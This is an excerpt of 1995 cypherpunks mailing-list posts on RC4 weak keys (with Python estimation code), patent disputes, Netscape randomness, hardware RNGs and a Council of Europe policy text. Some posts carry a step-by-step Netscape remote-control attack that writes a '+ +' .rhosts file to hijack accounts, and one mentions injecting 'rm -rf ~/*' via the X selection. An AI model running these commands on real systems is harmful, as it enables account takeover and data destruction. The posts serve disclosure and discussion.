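                         key_len: int = 10, seed: int = 1) -> float:
    """Fraction of random key_len-byte keys starting with prefix whose first
    len(first_out) keystream bytes equal first_out.  An empty prefix gives the
    unbiased baseline, expected near 1/65536 for two bytes."""
    rng = random.Random(seed)  # seeded so the estimate is repeatable
    hits = 0
    for _ in range(trials):
        tail = bytes(rng.randrange(256) for _ in range(key_len - len(prefix)))
        if rc4_keystream(prefix + tail, len(first_out)) == first_out:
            hits += 1
    return hits / trials


def untouched_estimate(n_entries: int) -> float:
    """Rough model (an assumption of this example) of the post's figures: the
    prediction survives if none of the n state entries fixed by the prefix is
    swapped away by the remaining 253 KSA rounds.  Treating j as uniform
    gives (1 - n/256)^253: about 0.14 for two entries (00 00 FD pins S[1]
    and S[2]) and about 0.05 for three (03 FD FC pins S[0], S[1], S[2])."""
    return (1 - n_entries / 256) ** 253


if __name__ == "__main__":
    # Published RC4 test vector: key "Key", plaintext "Plaintext".
    assert rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
    for prefix, expected in WEAK_PREFIXES.items():
        rate = fraction_with_prefix(prefix, expected, trials=2000)
        print(f"prefix {prefix.hex()}: predicted {predicted_first_two(prefix).hex()},"
              f" observed {expected.hex()} in {rate:.1%} of keys")
    baseline = fraction_with_prefix(b"", ZERO2, trials=2000)
    print(f"baseline (random keys -> 00 00): {baseline:.4%}")
```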
Andrew

________________________________________________________________
Andrew Roos // C++ programmers have class (but not much inheritance)
PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos

From jeffb at sware.com Fri Sep 29 05:28:46 1995
From: jeffb at sware.com (Jeff Barber)
Date: Fri, 29 Sep 95 05:28:46 PDT
Subject: Q&A on the RSA/Cylink legal dispute
In-Reply-To: <9508288123.AA812314973@snail.rsa.com>
Message-ID: <9509291227.AA03616@wombat.sware.com>

IANAL, but after a couple of hours of slogging through the arbitration report, here's my layman's interpretation:

- Either both sides or neither side breached the agreement forming PKP (the arbitrators went out their way to avoid assigning blame)

- PKP is dissolved by mutual agreement.

- Cylink maintains control of the Stanford patents (Hellman-Merkle, Diffie-Hellman [others (?)])

- RSA maintains control of the MIT patents (RSA [others])

- It isn't clear to me whether Cylink maintained the right to use the RSA software in creating a product. The arbitration order was as clear as mud on this point. It is clearer that they maintained the right to *use the patented technology* covered by the MIT patents in the creation of a product. In either case, it appears that their right does not extend to the point where they can sublicense the technology -- so it looks to me like Cylink can't sell you an RSA toolkit, for instance.

- RSA has no rights to license the Stanford patents.

RSA's FAQ (via baldwin at rsa.com) writes:

> A. The Panel's ruling was very specific.
> Everything it said about third
> parties, including RSA customers who use software, refers to their need
> for patent licenses. If you bought software from RSA and RSA itself had
> the rights to make that software and license it to you, you don't need
> a separate patent license; rights to the patents came with the product.
> The Ruling also states, "RSA has a right to license its software."

This answer is evasive. RSA didn't give the complete sentence from the arbitration panel's order. It is:

"Therefore, after April 6, 1990, RSA has a right to license its (RSA's) software to third-parties but does not have the right to license such third-parties under the Stanford patents."

So, their answer appears to be correct only if the RSA software doesn't infringe the Stanford patents. And that seems to be a matter of opinion. Furthermore, the next sentence in the order continues:

"To the extent RSA provides code to third-parties which causes an infringement of a valid and enforceable claim of the Stanford patents, assuming the third party is not separately licensed under the Stanford patent [sic], nothing in this order shall prevent Cylink from pursuing its rights under the Stanford patents against such third party."

That's pretty clear to me folks, but make your own judgements.

> If
> you're using RSA's software -you didn't write your own- you don't need
> a separate patent license under either the MIT or Stanford patents.

Again, only to the extent that you're not infringing the Stanford patents. So, pay your nickel, take your chances. Does RSA's software infringe the Stanford patents?

(Of course these are my opinions, not my company's)

-- Jeff

From nefud at io.com Fri Sep 29 05:57:13 1995
From: nefud at io.com (Allan Bailey)
Date: Fri, 29 Sep 95 05:57:13 PDT
Subject: screensavers and idle computation.
Message-ID: <199509291252.HAA13292@tristero.io.com>

To the folx working on the RC4 et. al.
distributed keysearch Net:

Add a module that will be run from things like "xscreensaver". As Tim May pointed out, current use of crypto is a "tiny fraction of the total computons consumed running screen savers". So let's use them, eh?

Besides, it'd be kind of neat seeing the "galaxies in hyperspace" displayed in a fractal like screensaver image.

-- 
Allan Bailey | "Freedom is not free." _O_ Senlima Diverseco je Senlimaj Kombinajxoj.
nefud at io.com | KC5KSF | GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++
============================================================
= When Privacy Is Outlawed, Only Outlaws Will Have Privacy =
=     I Support the Phil Zimmermann Legal Defense Fund!    =
=  email: zldf at clark.net  http://www.netresponse.com/zldf  =
============================================================

From klp at gold.tc.umn.edu Fri Sep 29 06:27:18 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Fri, 29 Sep 95 06:27:18 PDT
Subject: FinCen Blurb in local paper
Message-ID: <306bf42f13dd002@noc.cis.umn.edu>

Found this in the St Paul Pioneer Press yesterday, no wire service attribution.

Cyber banking risks cited

New York

Smart Cards, on-line banking and other high-tech consumer payment services could be exploited by money launderers and other crooks, a Treasury Department official warned Wednesday.

Stanley Morris, director of the Financial Crimes Enforcement Network, said that government and regulatory agencies believe the new systems, known as cyber banking, will profoundly alter financial services in the future.

"The government has got to get its act together" and quickly decide on whether on-line banking systems and smart cards require new regulations, Morris said.

Morris spoke to reporters after a day-long closed-door meeting of bankers, regulators, law enforcement officials and technology executives sponsored by FinCen, the government's anti-money laundering agency.
--- end article ---

-- 
Kevin Prigge                    | Holes in whats left of my reason,
CIS Consultant                  | holes in the knees of my blues,
Computer & Information Services | odds against me been increasin'
email: klp at cis.umn.edu         | but I'll pull through...

From millar at pobox.upenn.edu Fri Sep 29 06:29:07 1995
From: millar at pobox.upenn.edu (Dave Millar)
Date: Fri, 29 Sep 95 06:29:07 PDT
Subject: Assessing Netscape Commerce Server Risk
Message-ID: <199509291328.JAA08472@pobox.upenn.edu>

Would anyone care to critique this assessment?

>Q: What is the risk of implementing the Commerce Server without waiting for
>the Oct. 9 patch (which fixes the randomness problem with the server's
>public/private key pair)?

>A: The exposure is essentially this: if someone were to make a concerted
>attack on your public/private key pair, they might be able to discover your
>private key. Combined with net eavesdropping this would allow interception
>and decrypting of SSL-encrypted traffic to your Commerce Server, and
>combined with IP address and DNS domain impersonation would allow someone
>to masquerade as your server.
>
>I would characterize this risk as low to moderate, with the higher risk
>only applying if your Commerce Server is handling larger financial
>transactions or extremely sensitive information.
>
>The time required for an attack on your key pair depends on how close the
>attacker can come to guessing exactly when your key pair was generated, and
>what the pid/ppid were for the key generation program at the time the key
>was generated, as well as how fast the attacker can generate candidate key
>pairs. Since the time and pid/ppid are probably guessable only within
>broad limits (e.g., within a few days for the time), and generating key
>pairs takes on the order of a second or so, the estimated attack times are
>much longer than the attack times for SSL messages.
>I believe Netscape has
>published estimates like 60 days or so to crack a key pair; even if those
>estimates are too high by factors of two or three the times are still
>comparable to the time until the patch is available.
>
>So if you're really concerned you can certainly eliminate the risk by
>shutting down SSL-secure services until you get the patch; however I'd
>weigh that against the downside of not having those services accessible.
>
>P.S. If you do continue running your Commerce Server with SSL, one simple
>thing that might help thwart attacks is to do a "touch" on your server key
>file and server certificate file (or copy them somewhere and then copy them
>back) to update the date/time modified on the files. This eliminates one
>possible clue as to when the key pair was generated.

_________________________________________________
Dave Millar
University Information Security Officer
3401 Walnut St., Suite 265C
Philadelphia, PA 19104-6228
University of Pennsylvania
For security matters: security at isc.upenn.edu (read by Data Admin. staff)
Other matters: millar at pobox.upenn.edu
voice: (215) 898-2172  fax: (215) 898-1729
For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/
PGP Fingerprint: 28 FB 09 DC C7 96 C2 53 1A B8 BE 3B 73 32 46 4C

From Doug.Hughes at Eng.Auburn.EDU Fri Sep 29 06:35:40 1995
From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes)
Date: Fri, 29 Sep 95 06:35:40 PDT
Subject: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509282349.TAA00187@hoopsnake.cjs.net>
Message-ID:

>> One initial connection is all that is needed to have a secure
>> connection for the lifetime of the two communicating parties. This
>> initial connection can be accomplished via any number of ways. It
>> does involve an initial one time only shared secret. This is much
>> different than the many shared secrets and key management issues of
>> private and public key systems.
>> For the initial connection you can
>> stick the machines back to back if you are really worried about
>> security. This initial transaction serves as a seed for subsequent
>> transactions. All subsequent transactions depend on preceding
>> transactions. A degree of randomness comes from the randomness of
>> the messages. Each next word in the message is random.
>
>I'm a little new to this, but I thought the whole idea behind keys was
>not having to whisper "secrets" to someone on the other side of a
>crowded mall. Most people don't have the luxury of connecting their
>computers back to back with someone on the other side of the world
>just to ensure a secure communications path. There would have to be
>some mechanisms to ensure that secure delivery of your "secret", and
>that brings us back to key management, so the whole thing is rather
>self defeating.
>
>Christopher
>

Remember, that's only one of the options for the truly paranoid. If you want, you can just use their (for now secret) keying implementation on the floppy disk for the first exchange. I feel a little uncomfortable with this at the moment (as I'm sure do most of the other readers). The algorithm, once revealed should be a very interesting read.

However, this does not bring us back to key management in the sense of traditional public or private cryptosystems. Since the entire communication hinges on the first successful exchange, this is the exchange where the key is most critical. I believe they have an option for entering a secret key (initialization vector it seems) as well. So, presumably you could call somebody on the phone, or send them a PGP message, or whatever, to exchange this initial key.

It still seems to me that once this initial communication is out of the way, that the product will work fairly well.
I see it as an excellent way, in our situation, to provide remote professors and students secure communication paths to our network in the future (hinging on the development of some kind of telnet client).

I rather think that the whole public/private key thing is self-defeating... computers get more powerful, key gets hacked... key size increases.. etc.. etc.. This sounds like a novel alternative.

People interested in non-disclosure analysis may wish to contact the company.
Elementrix: 212-888-8879, 850 Third Avenue NY, NY 10022 (North America office)

I'm not sure what, if any, real cryptanalysis has been done on this. David Kahn himself admitted he wasn't an expert cryptanalyst. I don't know if anybody has done any in depth review or subjected it to differential cryptanalysis of any kind. It seems to be a OTP/stream cipher of some kind.. subsequent number depending on previous numbers. I don't know if it's possible to prove that the sequence will never repeat, having not seen the algorithm. But if it did not, it would seem to be strong enough. Too many questions, too few answers.

-- 
____________________________________________________________________________
Doug Hughes                                Engineering Network Services
System/Net Admin                           Auburn University
doug at eng.auburn.edu
Apple T-shirt on Win95 - "Been there, done that"

From jk at digit.ee Fri Sep 29 06:59:39 1995
From: jk at digit.ee (Jyri Kaljundi)
Date: Fri, 29 Sep 95 06:59:39 PDT
Subject: Netscape hole without .Xauthority (fwd)
Message-ID:

Haven't seen this on the cypherpunks yet, sorry if this has been here already.

Juri

o tel: +372 6308994 o>

)"
netscape -noraise -remote "saveAs(.rhosts)"
netscape -noraise -remote back

In the second command, the path should be specified whenever possible (~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that precise moment, then the chances are it worked !
Solution to the problem : every user concerned should either create a Xauthority file, or stop using Netscape.

MXK

PS: WHY do they bother with PGP and RSA security when they keep such holes ????

+------------------------------------+---------------------------------+
| Denis AUROUX (MXK)                 | Ecole Normale Superieure        |
| 255 rue Saint-Jacques              | 45 rue d'Ulm                    |
| 75005 PARIS FRANCE                 | 75005 PARIS                     |
| email: auroux at clipper.ens.fr     | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+

From cme at TIS.COM Fri Sep 29 08:18:02 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 29 Sep 95 08:18:02 PDT
Subject: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <199509282312.QAA26073@comsec.com>
Message-ID: <9509291514.AA15468@tis.com>

>From: "Jeff Weinstein"
>Date: Wed, 27 Sep 1995 00:40:41 -0700
>> What happens if NSRANDFILE is set to /dev/random ?
>> will netscape try to read an infinite number of random bytes ?
>
> In the current patch it will read up to 1 megabyte before stopping.
>In 2.0 I will add a way to specify a size. As a temporary hack you
>could use 'dd' to get the number of bytes you want into a file, then
>remove the file once netscape had started up.

or you can define a named pipe file (on UNIX at least) which runs /dev/random through dd.

From tcmay at got.net Fri Sep 29 08:39:00 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 29 Sep 95 08:39:00 PDT
Subject: Simple Hardware RNG Idea
Message-ID:

At 4:14 PM 9/28/95, cjs wrote:
>Hello all.
>
>Someone mentioned this on IRC last night, and it sounded like a really
>cool idea, so I thought I'd mention it.
>
>The idea is to generate random numbers using a geiger counter tube and
>a small portion of radioactive substance (like perhaps the stuff they
>use in smoke detectors?) Would that be random enough?
>
>I thought it was a neat idea anyway.

It's a well-known idea. My FAQ has a section on this, and the Cypherpunks archives have many mentions of this. For the newcomers, here are some of the issues, very briefly presented:

1. Incorporating a "Geiger counter tube" is nontrivial. A solid-state detector does the same thing, and is a better approach.

2. Incorporating Am-241 or other alpha emitters in microcurie levels would require licensing, regulatory oversight, etc., etc. Don't count on it.

3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K counts per second) would be too radioactive to ship.

4. Zener diodes and other random noise sources are cheaper to build, more consistent in output, and easier to integrate into actual products.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rajaram at morgan.com Fri Sep 29 09:02:46 1995
From: rajaram at morgan.com (P. Rajaram)
Date: Fri, 29 Sep 95 09:02:46 PDT
Subject: Traveling abroad with laptops
Message-ID: <9509291202.ZM20738@morgan.com>

What would happen if I flew out of the US with a portable computer that has crypto software (like PGP) installed ? Assuming that I had no intention of distributing the software abroad, would I be violating some US export law ?

Matt Blaze (?) had written about his humorous experience in trying to do the right thing. It seems that the US Govt. does not seriously enforce its own export policies.
But they may start doing so any time. I am sure that today many people regularly fly into Europe with crypto software, without intending to break any laws.

At one point, I had heard that some sort of exception was planned for export of crypto for personal use. Does anyone know if this is real or just a rumor ?

regards
-raj

From sameer at c2.org Fri Sep 29 09:40:25 1995
From: sameer at c2.org (sameer)
Date: Fri, 29 Sep 95 09:40:25 PDT
Subject: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: <199509291635.JAA06820@infinity.c2.org>

As of 9:34AM on the day of the release hackmsoft has so far received -two- microsoft bugs and exploits.

> 
> John Young writes:
> > 9-28-95. W$Japer:
> > 
> > Regarding Netscape, Mr. Dent of Microsoft said the
> > firm's security deficiencies that have recently come to
> > light have "tainted" electronic commerce on the
> > Internet.
> 
> That's almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry
> 

-- 
sameer                                   Voice:   510-601-9777
Community ConneXion                      FAX:     510-601-9734
An Internet Privacy Provider             Dialin:  510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From stripes at va.pubnix.com Fri Sep 29 09:42:39 1995
From: stripes at va.pubnix.com (Josh M. Osborne)
Date: Fri, 29 Sep 95 09:42:39 PDT
Subject: Netscape hole without .Xauthority (fwd)
In-Reply-To:
Message-ID:

In message , Jyri Kaljundi writes :
[...]
>There's a huge hole in the Netscape remote control mechanism for the
>X-Windows based clients.
>Potential impact : anybody can become any user that uses Netscape on any
>system without sufficient X security.
[...]
>PS: WHY do they bother with PGP and RSA security when they keep such holes
>????

Well, I would suspect that because if your X server isn't "secure" there isn't much you can do that is.
Other than xterm, most X programs will respond to "synthetic" events (events generated by another programs as opposed to the user), this means with a little work anyone with access to the X server could click open the File menu, select "Open URL", type in a URL, press "Open", click "SaveAs", and so on.

Even if all X clients stopped listening to synthetic events (which would be a shame - since they are useful in various contexts) X's event structure allows multiple X clients to listen for the same events on the same windows, so a simple program could track all keystrokes and capture your passwords.

Failing all of that any X client could track ownership of the X selection (the "cut buffer" normally used to hold text), and when it looks like a Unix command (implying that you will be pasting it into the command line) assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*" followed by a carriage return.

That's just off the top of my head ('tho I admit I have written two of the three "exploits" while I was a sysadmin 4 years ago in an effort to convince my managers to mandate better security than "xhost +"...).

So saying "Netscape isn't secure when my X server isn't" is a lot like saying "When I leave the front door of my house unlocked my VCR isn't safe!".

-- 
Not speaking for my employer, or anyone other than myself.

From banisar at epic.org Fri Sep 29 09:49:27 1995
From: banisar at epic.org (Dave Banisar)
Date: Fri, 29 Sep 95 09:49:27 PDT
Subject: COE Document
Message-ID:

------------------------------------------------------------------------
An HTML version of this document is available at the Privacy International Archives at www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html

Recommendation No.
R (95) 13 of the Committee of Ministers to Member States Concerning Problems of Criminal Procedure Law Connected with Information Technology

(Adopted by the Committee of Ministers on 11 September 1995 at the 543rd meeting of the Ministers' Deputies)

The Committee of Ministers, under the terms of Article 15.b of the Statute of the Council of Europe.

Considering that the aim of the Council of Europe is to achieve a greater unity between its members;

Having regard to the unprecedented development of information technology and its application in all sectors of modern society;

Realizing that the development of electronic information systems will speed up the transformation of traditional society into an information society by creating a new space for all types of communications and relations;

Aware of the impact of information technology on the manner in which society is organised and on how individuals communicate and interrelate;

Conscious that an increasing part of economic and social relations will take place through or by use of electronic information systems;

Concerned at the risk that electronic information systems and electronic information may also be used for committing criminal offenses;

Considering that evidence of criminal offenses may be stored and transferred by these systems;

Noting that criminal procedure laws of member states often do not yet provide for appropriate powers to search and collect evidence in these systems in the course of criminal investigations;

Recalling that the lack of appropriate special powers may impair investigating authorities in the proper fulfilment of their tasks in the face of the ongoing development of information technology;

Recognising the need to adapt the legitimate tools which investigating authorities are afforded under criminal procedure laws to the specific nature of investigations in electronic information systems;

Concerned by the potential risk that member states may not be able to render mutual legal
assistance in an appropriate way when requested to collect electronic evidence within their territory from electronic information systems;

Convinced of the necessity of strengthening international co-operation and achieving a greater compatibility of criminal procedural laws in this field;

Recalling Recommendation No. R (81) 20 of the Committee of Ministers on the harmonisation of laws relating to the requirement of written proof and to the admissibility of reproductions of documents and recordings on computers, Recommendation No. R (85) 10 on letters rogatory for the interception of telecommunications, Recommendation No. R (87) 15 regulating the use of personal data in the police sector and Recommendation No. R (89) 9 on computer-related crime,

Recommends the governments of member states:

i. when reviewing their internal legislation and practice, to be guided by the principles appended to this recommendation; and

ii. to ensure publicity for these principles among those investigating authorities and other professional bodies, in particular in the field of information technology, which may have an interest in their application.

Appendix to Recommendation No. R (95) 13 concerning problems of criminal procedure law connected with information technology

I. Search and seizure
-----------------------------

1. The legal distinction between searching computer systems and seizing data stored therein and intercepting data in the course of transmission should be clearly delineated and applied.

2. Criminal procedure laws should permit investigating authorities to search computer systems and seize data under similar conditions as under traditional powers of search and seizure. The person in charge of the system should be informed that the system has been searched and of the kind of data that has been seized.
The legal remedies that are provided for in general against search and seizure should be equally applicable in case of search in computer systems and in case of seizure of data therein.

3. During execution of a search, investigating authorities should have the power, subject to appropriate safeguards, to extend the search to other computer systems within their jurisdiction which are connected by means of a network and seize the data therein, provided immediate action is required.

4. Where automatically processed data is functionally equivalent to a traditional document, provisions in the criminal procedure law relating to search and seizure of documents should apply equally to it.

II. Technical Surveillance
-------------------------------------

5. In view of the convergence of information technology and telecommunications, laws pertaining to technical surveillance for the purpose of criminal investigations, such as interception of telecommunications, should be reviewed and amended, where necessary, to ensure their applicability.

6. The law should permit investigating authorities to avail themselves of all necessary technical measures that enable the collection of traffic data in the investigation of crimes.

7. When collected in the course of a criminal investigation and in particular when obtained by means of intercepting telecommunications, data which is the object of legal protection and processed by a computer system should be secured in an appropriate manner.

8. Criminal procedure laws should be reviewed with a view to making possible the interception of telecommunications and the collection of traffic data in the investigation of serious offenses against the confidentiality, integrity and availability of telecommunications or computer systems.

III. Obligations to co-operate with the investigating authorities
--------------------------------------------------------------------

9.
Subject to legal privileges or protection, most legal systems permit investigating authorities to order persons to hand over objects under their control that are required to serve as evidence. In a parallel fashion, provisions should be made for the power to order persons to submit any specified data under their control in a computer system in the form required by the investigating authority.

10. Subject to legal privileges or protection, investigating authorities should have the power to order persons who have data in a computer system under their control to provide all necessary information to enable access to a computer system and the data therein. Criminal procedure law should ensure that a similar order can be given to other persons who have knowledge about the functioning of the computer system or measures applied to secure the data therein.

11. Specific obligations should be imposed on operators of public and private networks that offer telecommunications services to the public to avail themselves of all necessary technical measures that enable the interception of telecommunications by the investigating authorities.

12. Specific obligations should be imposed on service providers who offer telecommunications services to the public, either through public or private networks, to provide information to identify the user, when so ordered by the competent investigating authority.

IV. Electronic Evidence
------------------------

13. The common need to collect, preserve, and present electronic evidence in ways that best ensure and reflect their integrity and irrefutable authenticity, both for the purposes of domestic prosecution and international co-operation, should be recognized. Therefore, procedures and technical methods for handling electronic evidence should be further developed, and particularly in such a way as to ensure their compatibility between states.
Criminal procedural law provisions on evidence relating to traditional documents should similarly apply to data stored in a computer system.

V. Use of Encryption
---------------------

14. Measures should be considered to minimise the negative effects of the use of cryptography on the investigation of criminal offenses, without affecting its legitimate use more than is strictly necessary.

VI. Research, statistics and training
-------------------------------------

15. The risks involved in the development and application of information technology with regard to the commission of criminal offenses should be assessed continuously. In order to enable the competent authorities to keep abreast of new phenomena in the field of computer related offenses and to develop appropriate counter-measures, the collection and analysis of data on these offenses, including modus operandi and technical aspects, should be furthered.

16. The establishment of specialised units for the investigation of offenses, the combating of which requires special expertise in information technology, should be considered. Training programmes enabling criminal justice personnel to avail themselves of expertise in this field should be furthered.

VII. International Cooperation
------------------------------

17. The power to extend a search to other computer systems should also be applicable when the system is located in a foreign jurisdiction, provided that immediate action is required. In order to avoid possible violations of state sovereignty or international law, an unambiguous legal basis for such extended search and seizure should be established. Therefore, there is an urgent need for negotiating international agreements as to how, when and to what extent such search and seizure should be permitted.

18. Expedited and adequate procedures as well as a system of liaison should be available according to which the investigating authorities may request the foreign authorities to promptly collect evidence.
For that purpose the requested authorities should be authorized to search a computer system and seize data with a view to its subsequent transfer. The requested authorities should also be authorized to provide traffic data related to a specific telecommunication, intercept a specific telecommunication or identify its source. For that purpose, the existing mutual legal assistance instruments need to be supplemented.

_________________________________________________________________________
Subject: COE Document
_________________________________________________________________________
David Banisar (Banisar at epic.org)        * 202-544-9240 (tel)
Electronic Privacy Information Center   * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     * HTTP://www.epic.org
Washington, DC 20003                    * ftp/gopher/wais cpsr.org

From mdiehl at dttus.com  Fri Sep 29 09:52:54 1995
From: mdiehl at dttus.com (Martin Diehl)
Date: Fri, 29 Sep 95 09:52:54 PDT
Subject: Netscape "random" number seed generator code available
Message-ID: <9508298123.AA812398949@cc2.dttus.com>

on 9/24/95 karlton at neon.netscape.com (Phil Karlton) at Internet-USA wrote:

  The random number seed generation code is now available for review:
  ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z

My platform is DOS 6.22, Windows 3.11

Can someone suggest a program (and where to get it) that will run on my
platform and extract the tar.z files into DOS ASCII files so that I can
review the key generator code?

Thanks for your help.

Martin G. Diehl

From sameer at c2.org  Fri Sep 29 09:55:35 1995
From: sameer at c2.org (sameer)
Date: Fri, 29 Sep 95 09:55:35 PDT
Subject: Netscape hole without .Xauthority (fwd)
In-Reply-To: 
Message-ID: <199509291644.JAA07516@infinity.c2.org>

That's called an X hole, not a netscape hole.
> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here
> already.
> 
> Juri
> 
> >o tel: +372 6308994 o>
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
> whatever you like) to the target Netscape client. This is quite easy, either
> if you have a personal WWW page (http://... URL) or an account on the
> target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
> netscape -noraise -remote "openURL()"
> netscape -noraise -remote "saveAs(.rhosts)"
> netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at that
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a
> Xauthority file, or stop using Netscape.
> 
> 	MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes ????
> 
> +------------------------------------+---------------------------------+
> | Denis AUROUX (MXK)                 | Ecole Normale Superieure        |
> | 255 rue Saint-Jacques              | 45 rue d'Ulm                    |
> | 75005 PARIS FRANCE                 | 75005 PARIS                     |
> | email: auroux at clipper.ens.fr     | FRANCE                          |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")		sameer at c2.org

From ses at tipper.oit.unc.edu  Fri Sep 29 09:58:17 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 29 Sep 95 09:58:17 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <199509290354.XAA21646@frankenstein.piermont.com>
Message-ID: 

On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> world, have real clients, and actually worry about this as a
> problem. This *is* a legitimate problem. Consider what the load on a
> web site using D-H key exchange for every connection gets like when
> you have millions of people hitting it every day.

This is the problem I was concerned about (actually RSA rather than D-H).
In HTTP-NG, in addition to supporting PK for key exchanges and
authentications, there is now support that allows most values used in the
protocol to be signed. Now that non-repudiability is becoming legally
significant, there are all sorts of things that either party might want to
have signed, for example negotiation options (e.g. wont-log-transactions)
and meta-information (e.g. kidcode: NC-17,barney-boffing). More clients
and more signings means that conventional chips aren't going to be
economical for this.
[stuff on hardware]

> The reason the market for this is weird is the same reason Sun took
> the DES chips off its motherboards years ago -- you can't conduct
> modern business with the fucked up export regime we are dealing with.

That's another question. A DSP chip can also be used for crypto - yet
sound cards and NeXTs aren't ITARed, and aren't really considered
dual-use. A modular exponentiator isn't a crypto device (hey - it's a
bignum accelerator for Mathematica). Now, if I had a pipelined WSI chip
capable of delivering one result per cycle, I could think of some useful
applications, but ...

Simon

From ses at tipper.oit.unc.edu  Fri Sep 29 10:09:34 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 29 Sep 95 10:09:34 PDT
Subject: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: 

On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> That's almost an invitation to hack Microsoft's web products, isn't it?

Not a real attack - 'cos it's just a Denial Of Service, but it is kind of
amusing...

Windows NT has an interesting property in its handling of TCP connection
establishment. NT has a small limit on the maximum size of its listen
queue - it also handles queue overflow in a different way to BSD derived
stacks. Instead of just dropping the connection request, and allowing the
client TCP to retry automatically, NT sends a RST packet that aborts the
connection.

Ok, you can shut down just about anything on the Net right now, and there
won't be a real defence possible until IPSEC starts getting installed,
but Microsoft makes it much too easy.
Simon

From stewarts at ix.netcom.com  Fri Sep 29 10:16:59 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 29 Sep 95 10:16:59 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <199509291716.KAA06460@ix8.ix.netcom.com>

At 01:01 PM 9/29/95 S, Andrew Roos wrote:
>(This is a repeat because I posted the original 36 hours ago and it still
>hasn't bounced back to me.)

Hmmm - I got it yesterday, so it did go out.

>The attack is based on two particularly interesting three-byte key
>prefixes which have a high probability of producing PRNG sequences
>which start with a known two-byte sequence. The prefixes are:
>1. Keys starting with "00 00 FD" which have a 14% probability of
>   generating sequences which start "00 00".
>2. Keys starting with "03 FD FC" which have a 5% probability of
>   generating sequences which start "FF 03".

[much interesting work deleted]

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that start with
00 00 or 03 FD; it means doing 2**-15 more random key generations,
and reducing the brute-force space by 2**-15, but it's a pretty small
reduction.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com  Fri Sep 29 10:17:42 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 29 Sep 95 10:17:42 PDT
Subject: Q&A on the RSA/Cylink legal dispute
Message-ID: <199509291716.KAA06480@ix8.ix.netcom.com>

At 08:27 AM 9/29/95 -0400, Jeff Barber wrote:
>That's pretty clear to me folks, but make your own judgements.
>> If you're using RSA's software -you didn't write your own- you don't need
>> a separate patent license under either the MIT or Stanford patents.
>Again, only to the extent that you're not infringing the Stanford patents.
>
>So, pay your nickel, take your chances. Does RSA's software infringe
>the Stanford patents?
The RSA algorithm, and thus RSA's software, uses public-key cryptography,
and is therefore within the scope of the claims of the Merkle-Hellman
and/or Hellman-Pohlig patents. Also, the recent RSAREF versions contain
Diffie-Hellman code, which is covered by the Diffie-Hellman patents
(but PGP doesn't use that version of RSAREF.)

On the other hand, the RSAREF license says that RSA will defend any
patent claims for use of its code (I forget if that was RSADSI or RSA
Labs), and Jim Bidzos confirms that that's still the case even after
the PKP breakup.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

